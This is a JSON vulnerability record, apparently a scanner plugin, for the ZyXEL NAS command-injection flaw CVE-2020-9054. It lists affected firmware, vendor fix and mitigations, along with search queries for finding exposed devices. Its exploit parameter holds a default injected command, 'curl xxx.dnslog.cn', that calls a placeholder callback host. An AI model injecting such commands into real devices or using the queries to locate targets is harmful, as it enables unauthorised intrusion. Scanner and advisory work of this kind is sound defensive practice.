{
  "Name": "ZyXEL NAS RCE (CVE-2020-9054)",
  "Description": "<p>Many ZyXEL products use NAS326 with firmware versions prior to V5.21 (AAZF.7) C0; NAS520 with firmware versions prior to V5.21 (AASZ.3) C0; and firmware versions prior to V5.21 (AATB.4) C0 NAS540; NAS542 using firmware versions prior to V5.21 (ABAG.4) C0; ZyXEL NSA210; ZyXEL NSA220; ZyXEL NSA220+; ZyXEL NSA221; ZyXEL NSA310; ZyXEL NSA310S; ZyXEL NSA320; ZyXEL NSA320S; ZyXEL NSA325;</p><p>Many ZyXEL products have operating system command injection vulnerabilities. Remote attackers can use this vulnerability to execute arbitrary code and obtain server permissions with the help of specially crafted HTTP POST or GET requests.</p>",
  "Product": "ZyXEL",
  "Homepage": "https://www.zyxel.com/",
  "DisclosureDate": "2020-03-08",
  "Author": "1291904552@qq.com",
  "FofaQuery": "cert=\"NAS326\"||banner=\"NAS326\"||cert=\"NAS520\"||banner=\"NAS520\"||cert=\"NAS540\"||banner=\"NAS540\"||cert=\"NAS542\"||banner=\"NAS542\"||body=\"/zyxel/login.html\"",
  "GobyQuery": "cert=\"NAS326\"||banner=\"NAS326\"||cert=\"NAS520\"||banner=\"NAS520\"||cert=\"NAS540\"||banner=\"NAS540\"||cert=\"NAS542\"||banner=\"NAS542\"||body=\"/zyxel/login.html\"",
  "Level": "3",
  "Impact": "<p>Many ZyXEL products have operating system command injection vulnerabilities. Remote attackers can use this vulnerability to execute arbitrary code and obtain server permissions with the help of specially crafted HTTP POST or GET requests.</p>",
  "Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml\">https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2.If not necessary, prohibit public network access to the system.</p>",
  "Translation": {
    "CN": {
      "Name": "ZyXEL 网络连接存储 NAS 设备远程命令执行漏洞（CVE-2020-9054）",
      "VulType": ["命令执行"],
	  "Tags": ["命令执行"],
      "Description": "<p>多款ZyXEL产品使用V5.21(AAZF.7)C0之前版本固件的NAS326；使用V5.21(AASZ.3)C0之前版本固件的NAS520；使用V5.21(AATB.4)C0之前版本固件的NAS540；使用V5.21(ABAG.4)C0之前版本固件的NAS542；ZyXEL NSA210；ZyXEL NSA220；ZyXEL NSA220+；ZyXEL NSA221；ZyXEL NSA310；ZyXEL NSA310S；ZyXEL NSA320；ZyXEL NSA320S；ZyXEL NSA325；ZyXEL NSA325v2。</p><p>多款ZyXEL产品中存在操作系统命令注入漏洞。远程攻击者可借助特制的HTTP POST或GET请求利用该漏洞执行任意代码，获取服务器权限。</p>",
      "Impact": "<p>多款ZyXEL产品中存在操作系统命令注入漏洞。远程攻击者可借助特制的HTTP POST或GET请求利用该漏洞执行任意代码，获取服务器权限。</p>",
      "Product": "ZyXEL",
      "Recommendation": "<p>⼚商已发布了漏洞修复程序，请及时关注更新：<a href=\"https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml\">https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml</a></p><p>1、通过防⽕墙等安全设备设置访问策略，设置⽩名单访问。</p><p>2、如⾮必要，禁⽌公⽹访问该系统。</p>"
    },
    "EN": {
      "Name": "ZyXEL NAS RCE (CVE-2020-9054)",
      "VulType": ["rce"],
	  "Tags": ["rce"],
      "Description": "<p>Many ZyXEL products use NAS326 with firmware versions prior to V5.21 (AAZF.7) C0; NAS520 with firmware versions prior to V5.21 (AASZ.3) C0; and firmware versions prior to V5.21 (AATB.4) C0 NAS540; NAS542 using firmware versions prior to V5.21 (ABAG.4) C0; ZyXEL NSA210; ZyXEL NSA220; ZyXEL NSA220+; ZyXEL NSA221; ZyXEL NSA310; ZyXEL NSA310S; ZyXEL NSA320; ZyXEL NSA320S; ZyXEL NSA325;</p><p>Many ZyXEL products have operating system command injection vulnerabilities. Remote attackers can use this vulnerability to execute arbitrary code and obtain server permissions with the help of specially crafted HTTP POST or GET requests.</p>",
      "Impact": "<p>Many ZyXEL products have operating system command injection vulnerabilities. Remote attackers can use this vulnerability to execute arbitrary code and obtain server permissions with the help of specially crafted HTTP POST or GET requests.</p>",
      "Product": "ZyXEL",
      "Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml\">https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2.If not necessary, prohibit public network access to the system.</p>"
    }
  },
  "References": [
    "https://nosec.org/home/detail/4159.html"
  ],
  "HasExp": true,
  "ExpParams": [
    {
      "name": "dnslog",
      "type": "input",
      "value": "curl xxx.dnslog.cn"
    }
  ],
  "ExpTips": null,
  "ScanSteps": null,
  "Tags": [
    "rce"
  ],
  "VulType": [
    "rce"
  ],
  "CVEIDs": [
    "CVE-2020-9054"
  ],
  "CVSSScore": "9.0",
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  },
  "CNNVD": [
    "CNNVD-202002-1216"
  ],
  "CNVD": [
    "CNVD-2020-15993"
  ]
}